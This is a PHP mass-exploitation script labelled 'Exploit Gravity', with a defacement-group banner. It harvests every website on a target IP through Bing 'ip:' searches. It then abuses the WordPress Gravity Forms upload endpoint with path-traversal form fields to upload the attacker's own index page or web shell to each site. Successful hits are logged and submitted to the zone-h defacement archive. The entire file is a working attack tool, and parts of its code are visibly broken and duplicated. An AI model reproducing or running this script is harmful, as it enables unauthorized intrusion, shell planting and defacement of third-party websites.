wis ~ Exploit Gravity

1. <?php
2.     echo "
3.  
4.                                  _____  ___  ____                         _     _    
5.  __ _ _ __ ___  _   _ _ __      |___ / / _ \| ___|   ___ _   _ _ __   ___| |__ | | __
6. / _` | '__/ _ \| | | | '_ \ _____ |_ \| | | |___ \  / __| | | | '_ \ / _ \ '_ \| |/ /
7. | (_| | | | (_) | |_| | |_) |_____|__) | |_| |___) | \__ \ |_| | | | |  __/ | | |   <
8. \__, |_|  \___/ \__,_| .__/     |____/ \___/|____/  |___/\__,_|_| |_|\___|_| |_|_|\_\
9. |___/                |_|                                                            
10.                            Auto Indexer Exploit Wordpress Gravity
11.  
12.    
13.     echo "\n\n";
14.  
15. echo "Enter IP Or Site  >>> ";
16. $site=trim(fgets(STDIN,1024));
17. echo "your index or Shell >>> ";
18. $index=trim(fgets(STDIN,1024));
19. $ip=gethostbyname("$site");
20. echo "Name Of Your Zone >>> ";
21. $hacker=trim(fgets(STDIN,1024));
22. {
23. $sites = array_map("site", bing("ip:$ip"));
24. $un=array_unique($sites);
25. echo "[+] Scanning -> ", $ip, "     Wait...  ";
26. echo "Found : ".count($sites)." sites\n\n";
27. foreach($un as $web){
28.    $site="http://$web/";
29.     $zone= "http://zone-h.org/notify/single";
30.     $path= "?gf_page=upload";
31.     $hacked="$site/_input__.html";
32.     $hackmode="1";
33.      $reson="1";
34.         $psyco = curl_init("$site/$path");
35.         curl_setopt($psyco, CURLOPT_POST, true);  
36.         curl_setopt($psyco, CURLOPT_POSTFIELDS, array( 'file'=>"@$index", 'name'=>'.html','form_id'=>'../../../','gform_unique_id'=>'../../'));
37.         curl_setopt($psyco, CURLOPT_RETURNTRANSFER, 1);
38.         curl_setopt($psyco, CURLOPT_FOLLOWLOCATION, 1);
39.         curl_setopt($psyco, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
40.         $result = curl_exec($psyco);
41.         curl_close($psyco);
42.        
43.         if (strstr($result, "\"ok\""))
44.         {
45.           echo "Ok :D -> ". $site ." Found : "."\n";             
46.              echo "Your Shell Or Index >>> $site/_input__.html"."\n\n";
47.             $save = fopen("bot.txt","a+"."\r\n");
48.             fwrite($save,"$site/_input__.html "."\r\n");
49.             echo "Miroir Of Zone-h Or Al Joyouch";
50.      $k = curl_init();
51.      curl_setopt($k, CURLOPT_URL, $zone);
52.      curl_setopt($k,CURLOPT_POST,1);
53.      curl_setopt($k,CURLOPT_POSTFIELDS,"defacer="."$hacker"."&domain1=".$hacked."&hackmode=".$hackmode."&reason=".$reson);
54.      curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
55.      curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
56.      $kubra = curl_exec($k);
57.      curl_close($k);
58.       if (eregi('OK', $kubra)) {
59.      echo "| Send Site To Zone-H\n";
60.         echo "| Site : ".$site." Ok ./done !";
61.     } else {
62.      echo "| Send Site To Zone-H\n";
63.         echo "| ".$site . " : Domain has been defaced during last year \n\n";
64.     }
65.     $a = curl_init();
66.     curl_setopt($a, CURLOPT_URL, $zone1);
67.     curl_setopt($a,CURLOPT_POST,1);
68.     curl_setopt($a, CURLOPT_POSTFIELDS,"hacker="."$hacker"."&site=".$hacked."&how=".$hackmode."&why=".$reson."&zo=zon&addsite=Send");
69.     curl_setopt($a,CURLOPT_FOLLOWLOCATION, true);
70.     curl_setopt($a, CURLOPT_RETURNTRANSFER, true);
71.     $kub = curl_exec($a);
72.     curl_close($a);
73.                 echo "| Site : ".$site." Ok ./done !";
74.     } else {
75.          echo "| Send Site To Zone-H\n";
76.         echo "| ".$site . " : Domain has been defaced during last year \n\n";
77.     }
78.         $a = curl_init();
79.         curl_setopt($a, CURLOPT_URL, $zone1);
80.         curl_setopt($a,CURLOPT_POST,1);
81.         curl_setopt($a, CURLOPT_POSTFIELDS,"hacker="."$hacker"."&site=".$hacked."&how=".$hackmode."&why=".$reson."&alj=aljyyosh&addsite=Send");
82.         curl_setopt($a,CURLOPT_FOLLOWLOCATION, true);
83.         curl_setopt($a, CURLOPT_RETURNTRANSFER, true);
84.         $kub = curl_exec($a);
85.         curl_close($a);
86.          if (eregi('OK', $kub)) {
87.          echo "\n\n"."| Send Site To wis\n";
88.                 echo "| Site : ".$site." ./done ! "."\n\n";
89.     } else {
90.          echo "| Send Site To wis\n";
91.         echo "| ".$site . " : Domain has been defaced during last year "."\n\n";
92.     }
93.                        
94.                 }else
95.                         echo "$site No "."\n\n";
96. }
97.  
98.  
99.  
100.  
101.  
102.  
103.  
104.  
105. }
106. function findit($mytext,$starttag,$endtag) {
107.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
108.  $posRight = stripos($mytext,$endtag,$posLeft+1);
109.  return  substr($mytext,$posLeft,$posRight-$posLeft);
110. }
111. function site($link){
112. return str_replace("","",parse_url($link, PHP_URL_HOST));
113. }
114. function bing($what){
115. for($i = 1; $i <= 2000; $i += 10){
116. $ch = curl_init();
117. curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
118. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
119. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
120. curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
121. curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
122. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
123. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
124. $data = curl_exec($ch);
125. preg_match_all('#;a=(.*?)" h="#',$data, $links);
126. foreach($links[1] as $link){
127. $allLinks[] = $link;
128. }
129. if(!preg_match('#"sw_next"#',$data)) break;
130. }
131.  
132. if(!empty($allLinks) && is_array($allLinks)){
133. return array_unique(array_map("urldecode", $allLinks));
134. }
135. }
136.  
137. ?>